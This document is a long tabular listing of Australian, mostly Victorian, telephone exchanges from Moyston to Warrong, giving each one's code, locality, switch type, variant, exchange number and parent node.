MOYS Moyston         ARK  ARK-M                    053 521067  HORX
MOYU Moyhu           ARK  ARK-M                    057 21 6067 WANX
MRAB Merrimac        AXE
MRAU Merrimac CMTS   AXE
MRDA Mernda          ARK  ARK-D                    03 404 1067 IVANHOE
MRJG Merrijig        ARK  ARK-M                    057 75 2067 SEYX
MRLA Mooralla        ARK  ARK-D                    055 730249  HMOX
MRLT Mortlake        ARK  ARK-M                    055 93 1067 WBOX
MRNA Maroona         SXS  APO-C                    053 521067  HORX
MRNO Merino          ARK  ARK-M                    055 73 0249 HMOX
MRRN Merricks North  ARK  ARK-M                    03 784 2254 DROMANA
MRTX Miners Rest 104 AXE  104                      053 370292  BRAX
MTAS Mt Tassie       ARK  ARK-M                    051 74 1067 TAGX
MTAX Mt Martha 104-1 AXE  104                      03 784 2353 DROMANA
MTBL Mt Buller       ARK  ARK-M                    057 75 2067 SEYX
MTBU Mt Bute         SXS  APO-C&D                  055 93 1067 WBOX
MTBY Mt Beauty       ARK  ARK-D                    057 55 1067 WANX
MTCA Mt Clear        ARK  ARK-D                    053 370294  BRAX
MTCO Mt Cottrell     ARK  ARK-M                    03 366 1067 FOOTSCRAY
MTDU Mt Duneed 104   AXE  104                      052 431067  GEEX/MOLP
MTEA Mt Eliza        ARE  113                      03 784 2297 DANDENONG
MTEC Mt Eccles       SXS  APO-C                    056 68 9211 MWRX
MTEN Mt Evelyn       ARE  114                      03 735 1067 CAMBERWELL
MTGA Mt Gambier-SA   ARM
MTGW Mt Gwynne       SXS  APO-C                    057 44 3067 WANX
MTHA Mt Martha 104-2 AXE  104                      03 784 2353 DROMANA
MTMN Mt Macedon      ARK  ARK-M                    054 22 1067 BGNX
MTON Merton          SXS  APO-C                    057 75 2067 SEYX
MTRE Montrose        ARE  113                      03 728 1067 CAMBERWELL
MTRI Mt Richmond     SXS  APO-B                    055 231067  HMOX
MTTR Mt Taylor       ARK  ARK-M                    051 53 3067 BAIX
MTWL Mt Wallace      ARK  ARK-M                    053 672067  BRAX
MUMB Mumbannar       ARK  ARK-M                    055 231067  HMOX
MUNG Metung          ARK  ARK-M                    051 52 3067 BAIX
MUNR Munro           ARK  ARK-D                    051 47 1067 SALG
MURC Murchison       ARK  ARK-D                    058 21 2067 SHPX
MURT Murtoa          ARK  ARK-M                    053 825067  HORX
MURV Murrayville     ARK  ARK-M                    050 921067  MILX
MWRB Morwell ARM     ARM			   051 34 1067 MWRX
MWRC Morwell MSE     ARF  REG-LP PRE REMO          051 34 1067 MWRX
MWRL Morwell         ARF  REG-LP PRE REMO          051 34 1067 MWRX
MWRS MORWELL L11     ARF			   051 34 1067 MWRX
MWRX Morwell Node    AXE  1010606/17               051 34 1067 MWRX
MYAH Molyullah       ARK  ARK-M                    057 61 1374 WANX
MYAL Myall           ARK  ARK-D                    054 52 1067 BGNX
MYDA Maroochydore    AXE
MYFC Myrtleford MSE  ARF  REG-LM                   057 55 1067 WANX
MYFD Myrtleford      ARF  REG-LM                   057 55 1067 WANX
MYFX Myrtleford 104  AXE  104                      057 55 1067 WANX
MYRE Myrrhee         SXS  APO-C                    057 21 6067 WANX
MYRK Mystic Park     ARK  ARK-M                    054 52 1067 BGNX
MYRN Myrniong        ARK  ARK-M                    053 672067  BRAX
NAGB Nagambie        ARK  ARK-M                    057 92 1067 SEYX
NAGE Naringal East   ARK  ARK-M                    055 62 1067 WBOX
NANN Nanneella       ARK  ARK-M                    054 82 1067 BGNX
NAPO Napoleons       AXE  104                      053 370294  BRAX
NARA Narracan        SXS  APO-C                    056 33 1067 WGUX
NARD Nirranda        ARK  ARK-D                    055 62 1067 WBOX
NARE Nareen          SXS  APO-C&D                  055 73 0249 HMOX
NARN Narre War'n Nth AXE  RSS-D                    03 704 6399 DANDENONG
NATH Nathalia        ARK  ARK-M                    058 62 1067 SHPX
NATI Natimuk         ARK  ARK-M                    053 825067  HORX
NATY Natya           ARK  ARK-M                    050 324567  SWIX
NAVA Navarre         ARK  ARK-D                    053 581067  HORX
NAWN Narre Warren A  AXE  10102/30                 03 704 6399 DANDENONG
NAWX Narre Warren B  AXE  1030208/77               03 704 6399 DANDENONG
NBAL North Balwyn    SXS  2000                     03 857 8067 BOX HILL
NBNG Narbethong      ARK  ARK-M                    03 735 1067 CAMBERWELL
NCLA Newcastle-NSW   ARM
NCLE Newcastle Node  AXE
NCLS Newcastle CMTS  AXE
NCOE Northcote       ARE  113/4                    03 489 1067 IVANHOE
NCOT Northcote Tand. ARF                           03  4891067 IVANHOE
NCOX Northcote Node  AXE  1030206/91               03 489 1067 IVANHOE
NDLY Nandaly         SXS  APO-C                    050 70 1067 SWIX
NEEJ Neerim Junction ARK  ARK-M                    056 23 5067 WGUX
NENE Nerrin Nerrin   SXS  APO-C                    053 521067  HORX
NESS North Essendon  ARF  REG-LP REMO CCR          03 379 1067 FOOTSCRAY
NETH Netherby        ARK  ARK-M                    053 911067  HORX
NEWH Newhaven        ARK  ARK-M                    059 52 1067 DROMANA
NEWS Newstead 104    AXE  104                      054 72 1067 BGNX
NEWX Newhaven        AXE  104                      059 52 1067 DROMANA
NGGK Naringaningalok ARK  ARK-D                    058 62 1067 SHPX
NGLG North Geelong   ARE  113                      052 781067  GEEX/MOLP
NGLX Nth Geelong RSS AXE  RSS-D                    052 781067  GEEX/MOLP
NHIC Nhill MSE       ARF  REG-LP PRE REMO          053 911067  HORX
NHIL Nhill           ARF  REG-LP PRE REMO          053 911067  HORX
NHIX Nhill 104       AXE  104                      053 911067  HORX
NLOC Nangiloc        ARK  ARK-M                    050 24 1067 MILX
NLYN Newlyn          ARK  ARK-D                    053 482067  BRAX
NMCC Nth Melb SA STP AXE  1020210/72               03 328 1067 FOOTSCRAY
NMEA Nth.Melb.Node   AXE  1030208/77               03 328 1067 FOOTSCRAY
NMEL North Melbourne ARE  113                      03 328 1067 FOOTSCRAY
NMES Nth.Melb.Tandem ARF			   03 328 1067 FOOTSCRAY
NMET Nth.Melb.L11    ARF			   03 328 1067 FOOTSCRAY
NMEX Nth.Melb.1 ISDN AXE  1030210/25               03 328 1067 FOOTSCRAY
NMEY Nth.Melb.2 ISDN AXE			   03 328 1067 FOOTSCRAY
NNGN Nar Nar Goon N  ARK  ARK-D                    059 41 1067 DANDENONG
NNGO Nar Nar Goon    AXE  104                      059 41 1067 DANDENONG
NOOA Noorat          ARK  ARK-D                    055 93 1067 WBOX
NOOJ Noojee          ARK  ARK-M                    056 23 5067 WGUX
NOOL Noorakool       SXS  APO-B                    054 53 2298 BGNX
NORG Norong          ARK  ARK-D
NORN Noorinbee North SXS  APO-B                    051 54 1067 BAIX
NOWA Nowa Nowa       ARK  ARK-M                    051 52 3067 BAIX
NPRT Newport         ARE  113                      03 391 1067 FOOTSCRAY
NREL Nariel          ARK  ARK-M
NRMS Neerim South    ARK  ARK-D                    056 23 5067 WGUX
NSDK Sydney 1 ISDN   AXE  1030210/25
NSDQ Sydney 3 ISDN   AXE  1020210/72
NSTE Newcastle       AXE
NTHL Notting Hill    AXE  RSS-D                    03 568 1067 WINDSOR
NTNM Sydney CMTS     AXE
NUMC Numurkah MSE    ARF  REG-LP PRE REMO          058 62 1067 SHPX
NUMU Numurkah        ARF  REG-LP PRE REMO          058 62 1067 SHPX
NUNG Nungurner       SXS  APO-C                    051 52 3067 BAIX
NWIL Nullawil        ARK  ARK-M                    054 95 1067 BGNX
NYAH Nyah            ARK  ARK-M                    050 32 4567 SWIX
NYOR Nyora           ARK  ARK-D                    056 55 1067 MWRX
NYOX Nyora           AXE  104                      056 55 1067 MWRX
OAKB Oakleigh B Node AXE  1030208/77               03 568 1067 WINDSOR
OAKL Oakleigh        ARE  113                      03 568 1067 WINDSOR
OAKX Oakleigh A Node AXE  1010606/17               03 568 1067 WINDSOR
OCGR Ocean Grove     ARF  REG-LM                   052 431067  GEEX/MOLP
OCGX Ocean Grove RSS AXE  RSS-D                    052 43 1067 GEEX/MOLP
OFFI Officer         ARK  ARK-D                    059 41 1067 DANDENONG
OKLS Oaklands        ARK  ARK-M
OLIN Olinda          SXS  2000                     03 758 1067 DANDENONG
OMBE Ombersley       ARK  ARK-M                    052 312067  GEEX/MOLP
OMEO Omeo            ARK  ARK-M                    051 59 1309 BAIX
ORBC Orbost MSE      ARF  REG-LP                   051 54 1067 BAIX
ORBO Orbost          ARF  REG-LP PRE REMO          051 54 1067 BAIX
ORBX Orbost 104      AXE  104                      051 54 1067 SALG
ORFO Orford          ARK  ARK-M                    055 62 1067 WBOX
ORGE Orange     NSW  AXE
ORMD Ormond          SXS  2000                     03 578 1067 WINDSOR
OURN Ournie          ARK  ARK-D
OUTT Outtrim         ARK  ARK-M                    056 55 1067 MWRX
OUYC Ouyen MSE       ARF  REG-LP PRE REMO          050 921067  MILX
OUYN Ouyen           ARF  REG-LP PRE REMO          050 921067  MILX
OZEN Ozenkadnook     SXS  APO-C&D                  055 85 1067 HMOX
PAKU Pakenham Up     ARK  ARK-M                    059 41 1067 DANDENONG
PALI Palinyewah      ARK  ARK-M                    050 238 729 MILX
PANM Panmure         ARK  ARK-D                    055 62 1067 WBOX
PANT Panton Hill     AXE  AXE-104                  03 718 1067 IVANHOE
PARG Paragon         ARK  ARK-D
PARW Parwan          ARK  ARK-M                    053 672067  BRAX
PASC Paschendale     ARK  ARK-M                    055 73 0249 HMOX
PATH Patho           ARK  ARK-D                    054 82 1067 BGNX
PATK Patchewollock   ARK  ARK-M                    050 70 1067 SWIX
PAYV Paynesville     ARK  ARK-M                    051 52 3067 BAIX
PAYX Paynesville 104 AXE  104                      051 52 3067 SALG
PBAN Pan Ban         SXS  APO-B                    050 238 729 MILX
PCOK Point Cook      AXE  RSS-D                    03 369 1067 FOOTSCRAY
PEAR Pearcedale RSS  AXE  RSS-D                    03 784 2410 DROMANA
PEGH Peterborough    ARK  ARK-D                    055 93 1067 WBOX
PENS Penshurst       ARK  ARK-D                    055 730249  HMOX
PERT Perth           AXE
PGNT Poowong North   SXS  APO-C                    056 55 1067 MWRX
PIAL Piangil         ARK  ARK-D                    050 32 4567 SWIX
PICO Picola          ARK  ARK-M                    058 62 1067 SHPX
PIEK Perth 2 ISDN    AXE  1020210/72
PIGR Pine Grove East ARK  ARK-M                    054 82 1067 BGNX
PILO Pine Lodge      ARK  ARK-M                    058 21 2067 SHPX
PIMP Pimpinio        SXS  APO-C                    053 825067  HORX
PIPK Pipers Creek    ARK  ARK-D                    054 22 1067 BGNX
PIPO Pigeon Ponds    SXS  APO-C&D                  055 730249  HMOX
PKAC Pakenham MSE    ARF  REG-LP PRE REMO          059 41 1067 DANDENONG
PKAM Pakenham        ARF  REG-LP PRE REMO          059 41 1067 DANDENONG
PKAX Pakenham 104    AXE  104                      059 41 1067 DANDENONG
PLTN Powelltown      ARK  ARK-D                    03 735 1067 CAMBERWELL
PMEX Port Melb.Node  AXE  1020108/76               03 646 1067 PORT MELBOURNE
PMSC Perth CMTS      AXE
POCA Port Campbell   ARK  ARK-D                    055 93 1067 WBOX
POFI Port Fairy      AXE  104 & ARK-M              055 62 1067 WBOX
POMB Pomborneit      ARK  ARK-D                    055 93 1067 WBOX
POMO Pomonal         ARK  ARK-D                    053 581067  HORX
POOL Poolaijelo      SXS  APO-C&D                  055 85 1067 HMOX
POON Pooncarie       ARK  ARK-M                    050 238 729 MILX
POOW Poowong         ARK  ARK-M                    056 55 1067 MWRX
PORC Portland MSE    ARF  REG-LP PRE REMO          055 213067  HMOX
PORD Portland        ARF  REG-LP PRE REMO          055 231067  HMOX
PORX Portland 104    AXE  104                      055 231067  HMOX
POUK Pound Creek     SXS  APO-C                    056 72 1067 MWRX
PPKH Porepunkah      ARK  ARK-M                    057 55 1067 WANX
PRCA Perricoota      SXS  APO-C                    054 82 1067 BGNX
PRES Piries 104      AXE  104                      057 75 2067 WANX
PRIN Princetown      ARK  ARK-D                    055 93 1067 WBOX
PRSX Adelaide 3      AXE
PRTA Perth ARM       ARM
PRTH Perth 10c       10C
PRTN Preston         ARE  113                      03 470 1067 IVANHOE
PTON Portarlington   ARK  ARK-M                    052 431067  GEEX/MOLP
PUCK Puckapunyal     ARK  ARK-M                    057 92 1067 SEYX
PURA Pura Pura       SXS  APO-C&D                  055 93 1067 WBOX
PURN Purnim          ARK  ARK-M                    055 62 1067 WBOX
PVEW Pine View       ARK  ARK-D                    054 52 1067 BGNX
PYAL Pyalong         ARK  ARK-M                    057 82 1067 SEYX
PYRA Pyramid Hill    ARK  ARK-M                    054 52 1067 BGNX
QUAM Quambatook      ARK  ARK-M                    054 52 1067 BGNX
QUAN Quantong        ARK  ARK-D                    053 825067  HORX
QUEN Queenscliff     ARE  113                      052 431067  GEEX/MOLP
RAGL Raglan          ARK  ARK-M                    053 521067  BRAX
RAIN Rainbow         ARK  ARK-M                    053 981067  HORX
RANB Rand            SXS  APO-C
RANC Ranceby         ARK  ARK-M                    056 55 1067 MWRX
RATH Rathscar        ARK  ARK-D                    054 61 1067 BGNX
RAYD Raywood         ARK  ARK-M                    054 43 1067 BGNX
RCMD Richmond        ARE  114                      03 429 1067 CAMBERWELL
RCMX Richmond Node   AXE  1030208/77               03 429 1067 CAMBERWELL
RDHL Red Hill        ARK  ARK-D                    03 784 2254 DROMANA
RDLE Rosedale        ARK  ARK-D                    051 74 1067 TAGX
REDB Redbank         ARK  ARK-D                    054 61 1067 BGNX
REDE Redesdale       ARK  ARK-M                    054 22 1067 BGNX
REFS Red Cliffs      AXE  RSS-D                    050 241067  MILX
RENN Rennie          ARK  ARK-D
RESH Research        AXE  RSS-D                    03 439 1067 IVANHOE
RFSR Rufus River     ARK  ARK-M                    050 238 729 MILX
RGLN Rutherglen      ARK  ARK-D
RHEO Rheola          ARK  ARK-M                    054 43 1067 BGNX
RHYL Rhyll           ARK  ARK-D                    059 52 1067 DROMANA
RIDL Riddels Creek   ARK  ARK-M                    054 22 1067 BGNX
RIPN Ripponhurst     ARK  ARK-D                    055 730249  HMOX
RIPP Ripplebrook     ARK  ARK-M                    056 23 5067 WGUX
RKBK Rockbank        AXE  RSS-D                    03 366 1067 FOOTSCRAY
ROCH Rochester       ARK  ARK-M                    054 82 1067 BGNX
ROCX Rochester 104   AXE  104
ROKE Rokewood        ARK  ARK-D                    053 370294  BRAX
ROKY Rokeby          ARK  ARK-M                    056 23 5067 WGUX
ROLE Robinvale       ARK  ARK-M                    050 26 3939 MILX
ROMS Romsey          ARK  ARK-D                    054 22 1067 BGNX
ROMX Romsey 104      AXE  104                      054 22 1067 BGNX
ROSB Rosebud         ARF  REG-LM                   03 784 2329 DROMANA
ROWV Rowville RSS    AXE  RSS-D                    03 758 1067 DANDENONG
ROWY Rowsley         SXS  APO-C                    053 672067  BRAX
RSRY Rosebery        ARK  ARK-M                    050 70 1067 SWIX
RSVR Reservoir       ARE  113/4                    03 460 1067 IVANHOE
RTOE Rockhampton Qld AXE
RUFY Ruffy           ARK  ARK-D                    057 95 2067 SEYX
RUPA Rupanyup        ARK  ARK-M                    053 825067  HORX
RUSI Russell 1 ISDN  AXE  1020210/72               03 654 1067 CBD
RUSN Russell 2 ISDN  AXE  1020210/72               03 654 1067
RUSS Russell         ARE  113                      03 654 1067 CBD
RUSX Russell A Node  AXE  1030208/77               03 654 1067 CBD
RUSY Russell B Node  AXE  1030208/77               03 654 1067 CBD
RUWH Rushworth       ARK  ARK-M                    058 52 1067 SHPX
RWOD Ringwood Node   AXE  1010606/17               03 870 1099 BOX HILL
RWTE Rosewhite       ARK  ARK-M                    057 55 1067 WANX
RYEE Rye             AXE  RSS-D                    03 784 2268 DROMANA
RYON Ryanston        ARK  ARK-M                    056 72 1067 MWRX
SAFH Safety Beach    ARK  ARK-M                    03 784 2254 DROMANA
SALB St Albans       ARE  113                      03 366 1067 FOOTSCRAY
SALE Sale            ARF  REG-LP PRE REMO          051 44 2067 SALG
SALF Sale MSE        ARF  REG-LP PRE REMO          051 44 2067 SALG
SALG Sale Node       AXE  1030208/77               051 44 2067 SALG
SANG Sanger          ARK  ARK-D
SANR San Remo        ARK  ARK-M                    056 72 1067 MWRX
SATD Strathdownie    ARK  ARK-M                    055 81 1067 HMOX
SCAR Scarsdale       ARK  ARK-M                    053 370294  BRAX
SCAS Sarsfield       ARK  ARK-D                    051 52 3067 BAIX
SCCK Scotts Creek    ARK  ARK-D                    055 93 1067 WBOX
SCDG Scoresby OTC    AXE
SCOG Scoresby-OTC    AXE  GATEWAY                  763 1100
SCOY Scoresby        ARE  113                      03 758 1067 DANDENONG
SCTA Scotia          ARK  ARK-M                    050 238 729 MILX
SEAF Seaford         ARE  113                      03 784 2346 DANDENONG
SEAV Seaview         SXS  APO-C                    056 23 5067 WGUX
SEEK Strath Creek    ARK  ARK-M                    057 82 1067 SEYX
SEFN Seaford Nth RSS AXE  RSS-D                    03 781 2346 DANDENONG
SELC Sea Lake        ARK  ARK-M                    050 70 1067 SWIX
SERP Serpentine      ARK  ARK-M                    054 43 1067 BGNX
SERT Strathmerton    ARK  ARK-M                    058 72 1067 SHPX
SERV Serviceton      ARK  ARK-M                    053 911067  HORX
SEYC Seymour MSE     ARF  REG-LP PRE REMO          057 92 1067 SEYX
SEYM Seymour         ARF  REG-LP PRE REMO          057 92 1067 SEYX
SEYX Seymour Node    AXE  1030208/77               057 92 1067 WANX
SGHT Brisbane 5      AXE
SHAC Shady Creek     ARK  ARK-M                    056 23 5067 WGUX
SHAM Sydenham        AXE  RSS-D                    03 366 1067 FOOTSCRAY
SHEF Shelford        ARK  ARK-D                    052 781067  GEEX/MOLP
SHEH Sheep Hills     SXS  APO-C                    053 981067  HORX
SHEN St Helens Pls   SXS  APO-C                    053 825067  HORX
SHLC Sth Launceston  AXE
SHOR Shoreham        ARK  ARK-D                    03 784 2254 DROMANA
SHPC Shepparton MSE  ARF  REG-LP PRE REMO          058 21 2067 SHPX
SHPE Shepparton East ARK  ARK-D                    058 21 2067 SHPX
SHPN Shepparton      ARF  REG-LM                   058 21 2067 SHPX
SHPX Shepparton Node AXE  1030208/77               058 21 2067 SHPX
SILN Silvan          ARK  ARK-D                    03 724 2246 CAMBERWELL
SIMP Simpson         ARK  ARK-D                    055 93 1067 WBOX
SKIP Skipton         ARK  ARK-M                    053 370294  BRAX
SKRA St.Kilda T.A.C. AXE  RSS-D                    03 526 1067 WINDSOR
SKYE Skye            ARK  ARK-D                    03 784 2254 DANDENONG
SMEA Smeaton         ARK  ARK-D                    053 482067  BRAX
SMEL South Melbourne ARE  113                      03 690 1067 PORT MELBOURNE
SMEX South Melbourne AXE                           03 690 1067 PORT MELBOURNE
SMRN South Morang    ARE  114                      03 404 1067 IVANHOE
SNAK Savernake       SXS  APO-C
SNAV Snake Valley    ARK  ARK-M                    053 370294  BRAX
SNDM Sandringham     ARE  113                      03 555 1067 WINDSOR
SNLY Stanley         SXS  APO-C                    057 21 6067 WANX
SNPE Stanhope        ARK  ARK-M                    058 52 1067 SHPX
SNPL Swanpool        ARK  ARK-D                    057 61 1374 WANX
SOAK South Oakleigh  ARE  113                      03 575 1067 WINDSOR
SOGI Strathbogie     ARK  ARK-M                    057 95 2067 SEYX
SOKE Stradbroke      ARK  ARK-D                    051 44 2067 SALG
SOME Somerville      AXE  RSS-D                    03 784 2410 DROMANA
SOMX Somerville      AXE                           03 781 3399 DROMANA
SOPA Southport       AXE
SORR Sorrento        SXS  2000                     03 784 2268 DROMANA
SPAY Seaspray        ARK  ARK-D                    051 44 2067 SALG
SPHT Springhurst     ARK  ARK-M                    057 21 6067 WANX
SPLE Springvale      ARE  113                      03 546 1067 WINDSOR
SPOA Seabastopol RSS AXE  RSS-D                    053 370294  BRAX
SPOL Seabastopol     SXS  2000                     053 370294  BRAX
SPUR Sth Purrumbete  ARK  ARK-D                    055 93 1067 WBOX
SRTN Somerton        AXE  RSS-D                    03 359 1067 FOOTSCRAY
STAC St Arnaud MSE   ARF  REG-LP PRE REMO          054 95 1067 BGNX
STAR St Arnaud       ARF  REG-LP PRE REMO          054 95 1067 BGNX
STAS St Andrews      ARK  ARK-M                    03 718 1067 IVANHOE
STEC Stawell MSE     ARF  REG-LP REMO              053 581067  BGNX
STEL Stawell         ARF  REG-LP REMO              053 581067  HORX
STEX Stawell 104     AXE  104                      053 581067  HORX
STHN Stonehaven      ARK  ARK-M                    052 781067  GEEX/MOLP
STJC St John-TAS     ARF
STJQ St Johns  Tas.  AXE
STJS St James        ARK  ARK-M                    057 44 3067 WANX
STKA St Kilda        ARE  113                      03 534 1067 WINDSOR
STLS St Leonards     ARK  ARK-M                    052 431067  GEEX/MOLP
STLX St.Leonards RSS AXE  RSS-D                    052 43 1067 GEEX/MOLP
STNL Stoneleigh      ARK  ARK-D                    053 521067  BRAX
STOH Stockyard Hill  SXS  APO-C                    053 521067  BRAX
STRA Strathfieldsaye ARK  ARK-M                    054 43 1067 BGNX
STRD Stratford       ARK  ARK-M                    SALG
STRE Streatham       SXS  APO-C                    053 521067  BRAX
STRI Strzelecki      SXS  APO-C                    056 55 1067 MWRX
STRN Strathallan     ARK  ARK-M                    054 82 1067 BGNX
STUM Stuart Mill     ARK  ARK-M                    054 95 1067 BGNX
SUNB Sunbury         ARE  113                      03 744 1067 FOOTSCRAY
SUNS Sunshine        ARE  113                      03 311 1067 FOOTSCRAY
SURP Surfers P'dise  AXE
SUTT Sutton Grange   ARK  ARK-D                    054 72 1067 BGNX
SWAM Swan Marsh      ARK  ARK-M                    052 312067  GEEX/MOLP
SWAX Swan Reach 104  AXE  104                      051 52 3067 SALG
SWCK Swifts Creek    ARK  ARK-M                    051 59 1309 BAIX
SWIB Swan Hill STE   ARM			   050 32 4567 SWIX
SWIC Swan Hill MSE   ARF  REG-LP PRE REMO          050 32 4567 SWIX
SWIL Swan Hill       ARF  REG-LP PRE REMO          050 32 4567 SWIX
SWIX Swan Hill Node  AXE  1030208/77               050 32 4567 SWIX
SYCK Sandy Creek     ARK  ARK-D
SYDA Sydney 1 ARM    ARM
SYDB Sydney 2 ARM    ARM
SYDC Sydney 3        10C
SYDD Sydney 4        10C
SYDE Sydney 5        10C
SYPT Sandy Piont     ARK  ARK-D                    056 82 2067 MWRX
SYRA South Yarra     ARE  113                      03 867 1067 CAMBERWELL
SYRX South Yarra     AXE  1031008/36               03 867 1067 SOUTH YARRA
SYYF Sydney 6        AXE
SYYG Sydney 7        AXE
TABB Tab ACD         AXE  03 878 1067
TABL Table Top       ARK  ARK-D
TABO Tabor           ARK  ARK-D                    055 730249  HMOX
TABV Tab ACD         AXE			   03 867 1067
TAGC Traraglon MSE   ARF  REG-LP PRE REMO          051 74 1067 TAGX
TAGN Traralgon       ARF  REG-LP PRE REMO          051 74 1067 TAGX
TAGX Traralgon Node  AXE  1030208/77               051 74 1067 TAGX
TAHA Tahara          SXS  APO-C&D                  055 73 0249 HMOX
TALG Talgarno        ARK  ARK-D
TALK Telangatuk      ARK  ARK-M                    053 825067  HORX
TALM Talmalo         ARK  ARK-D
TALT Talbot          ARK  ARK-D                    054 61 1067 BGNX
TALX Taylors Lakes   AXE  RSS-D                    03 366 1067 FOOTSCRAY
TAMA Toolamba        ARK  ARK-D                    058 21 2067 SHPX
TANK Tankerton       ARK  ARK-D                    03 784 2298 DROMANA
TANS Tanjil South    ARK  ARK-D                    051 27 1067 WGUX
TARK Tarranyurk      ARK  ARK-D                    053 981067  HORX
TARV Tarraville      ARK  ARK-D                    051 82 5062 MWRX
TARY Tarrayoukyan    SXS  APO-C&D                  055 73 0249 HMOX
TATU Tatura          ARF  REG-LM                   058 21 2067 SHPX
TATX Tatura          AXE  RSS-D                    058 21 2067 SHPX
TATY Tatyoon         SXS  APO-C                    053 521067  HORX
TAVY Tallangatta Vy  ARK  ARK-D
TBCG Tambo Crossing  ARK  ARK-M                    051 52 3067 BAIX
TDIN Tooradin        ARK  ARK-M                    059 96 1067 DANDENONG
TEES Teesdale        ARK  ARK-M                    052 781067  GEEX/MOLP
TELD Telopea Downs   ARK  ARK-M                    053 911067  HORX
TENN Tennyson        ARK  ARK-M                    054 82 1067 BGNX
TERA Terang          ARF  REG-LM                   055 93 1067 WBOX
TERC Terang MSE      ARF  REG-LM                   055 93 1067 WBOX
TGLA Tongala         ARK  ARK-M                    058 52 1067 SHPX
TGMH Tungamah        AXE  104                      057 44 3067 WANX
TGTY Taggerty        ARK  ARK-D                    057 72 1067 SEYX
TGUM The Gums        SXS  APO-C&D                  055 730249  HMOX
TGUR The Gurdies     ARK  ARK-D                    059 41 1067 DANDENONG
THGA Thurgoona       ARK  ARK-D
THNA Thoona          ARK  ARK-D                    057 61 1374 WANX
THTN Thomastown      ARE  113/4                    03 465 1067 IVANHOE
THTP Tally Ho T/Park AXE  RSS-D                    03 808 1067 CAMBERWELL
THUL Thule           SXS  APO-C                    054 53 2298 BGNX
TIMB Timboon         ARK  ARK-M                    055 93 1067 WBOX
TIMM Timmering       ARK  ARK-D                    054 82 1067 BGNX
TINA Tinamba         ARK  ARK-D                    051 47 1067 SALG
TLBA Tullaburra      SXS  APO-C                    054 53 2298 BGNX
TLKL Tullakool       SXS  APO-C                    054 53 2298 BGNX
TLRC Tidal River     ARF  RCEE                     056 82 2067 MWRX
TLTA Tallangatta     ARK  ARK-D
TMIE Tolmie          ARK  ARK-M                    057 75 2067 SEYX
TMNE Tullamarine     ARE  113                      03 338 1067 FOOTSCRAY
TMPY Tempy           ARK  ARK-M                    050 92 1067 MILX
TMWE Templestowe     ARE  113                      03 848 1067 BOX HILL
TNBY Thornbury       ARE  113                      03 484 1067 IVANHOE
TNIT Tarneit         ARE  114                      03 741 1067 FOOTSCRAY
TNLR Tarwin Lr       ARK  ARK-M                    056 63 5299 MWRX
TNSE Townsville      AXE
TNTN Thornton        ARK  ARK-M                    057 72 1067 SEYX
TOAC Tooborac        SXS  APO-C                    054 43 1067 BGNX
TOBD Toowoomba       AXE
TOGI Toolangi        ARK  ARK-M                    03 735 1067 CAMBERWELL
TOLE Toolern Vale    ARK  ARK-D                    03 366 1067 FOOTSCRAY
TONI Tonimbuk        SXS  APO-C                    056 23 5067 WGUX
TOOL Toolleen        ARK  ARK-M                    054 43 1067 BGNX
TOOO Toolong         ARK  ARK-D                    055 62 1067 WBOX
TOOR Toora           ARK  ARK-D                    056 82 2067 MWRX
TOPI Topiram         ARK  ARK-M                    056 23 5067 WGUX
TORM Toorloo Arm     ARK  ARK-D                    051 52 3067 BAIX
TORQ Torquay         ARK  ARK-M                    052 431067  GEEX/MOLP
TORX Torquay 104     AXE  104                      052 431067  GEEX/MOLP
TPDE Thorpdale       ARK  ARK-D                    056 33 1067 WGUX
TRAC Trafalgar MSE   ARF  REG-LP PRE REMO          056 33 1067 WGUX
TRAF Trafalgar       ARF  REG-LP PRE REMO          056 33 1067 WGUX
TRAG Tragowel        ARK  ARK-D                    054 52 1067 BGNX
TRAK Toorak Node     AXE  1010606/17               03 824 1099 CAMBERWELL
TRAN Traynors lagoon ARK  ARK-D                    054 95 1067 BGNX
TRAS Traralgon South ARK  ARK-D                    051 74 1067 TAGX
TREN Trentham        ARK  ARK-D                    054 22 1067 BGNX
TSIS The Sisters     ARK  ARK-D                    055 93 1067 WBOX
TTAS Tallangatta Sth ARK  ARK-D
TTNG Tatong          ARK  ARK-D                    057 61 1374 WANX
TTRA Tintaldra       ARK  ARK-D
TURF Turriff         ARK  ARK-M                    050 70 1067 SWIX
TWAL Tocumwal        ARK  ARK-M                    058 72 1067 SHPX
TWNG Towong          ARK  ARK-D
TYAB Tyabb           ARK  ARK-D                    03 784 2298 DROMANA
TYER Tyers           ARK  ARK-D                    051 74 1067 TAGX
TYGA Tallygaroopna   ARK  ARK-D                    058 21 2067 SHPX
TYHO Tally Ho        ARE  113                      03 802 1067 CAMBERWELL
TYLD Tylden          ARK  ARK-D                    054 22 1067 BGNX
TYRN Tyrendarra      ARK  ARK-M                    055 231067  HMOX
ULTA Ultima          ARK  ARK-M                    050 324567  SWIX
UNDL Underbool       ARK  ARK-M                    050 92 1067 MILX
UNDR Undera          ARK  ARK-M                    058 21 2067 SHPX
VASE Vasey           SXS  APO-C&D                  055 730249  HMOX
VENB Venus Bay       ARK  ARK-M                    056 63 7111 MWRX
VICV Victoria Valley ARK  ARK-D                    055 730249  HMOX
VIOL Violet Town     ARK  ARK-D                    057 95 2067 SEYX
VITN Vite Vite North SXS  APO-B                    055 93 1067 WBOX
VNOR Ventnor         ARK  ARK-D                    059 52 1067 DROMANA
WAAI Waaia           ARK  ARK-M                    058 62 1067 SHPX
WAAK Warrak          SXS  APO-C                    053 521067  HORX
WACE Wallace         ARK  ARK-D                    053 370294  BRAX
WADI Wandin          ARK  ARK-M AND -D             03 735 1067 CAMBERWELL
WADO Wandong         ARK  ARK-D                    057 82 1067 SEYX
WAGB Wagga Wagga     ARM
WAHG Wahring         ARK  ARK-D                    057 92 1067 SEYX
WAIE Waitche         ARK  ARK-D                    050 324567  SWIX
WALA Walla Walla     ARK  ARK-D
WALB Walbundrie      ARK  ARK-D
WALD Wallandool      ARK  ARK-D
WALH Walhalla        SXS  APO-B                    051 27 1067 MWRX
WALK Walkerville     ARK  ARK-M                    056 63 2299 MWRX
WAMI Adelaide 2 ISDN AXE  1020210/72
WANB Wangaratta STE  ARM			   057 21 6067 WANX
WANC Wangaratta MSE  ARF  REG-LM                   057 21 6067 WANX
WANG Wangaratta      ARF  REG-LM                   057 21 6067 WANX
WANV Wando Vale      SXS  APO-C&D                  055 81 1067 HMOX
WANX Wangaratta Node AXE  1030208/77               057 21 6067 WANX
WAPK Wonga Park      AXE  RSS-D                    03 724 2246 CAMBERWELL
WARA Woorarra        ARK  ARK-D                    056 82 2067 MWRX
WARB Warburton 104-2 AXE  104                      059 66 2067 CAMBERWELL
WARG Warrong         ARK  ARK-M                    055 62 1067 WBOX
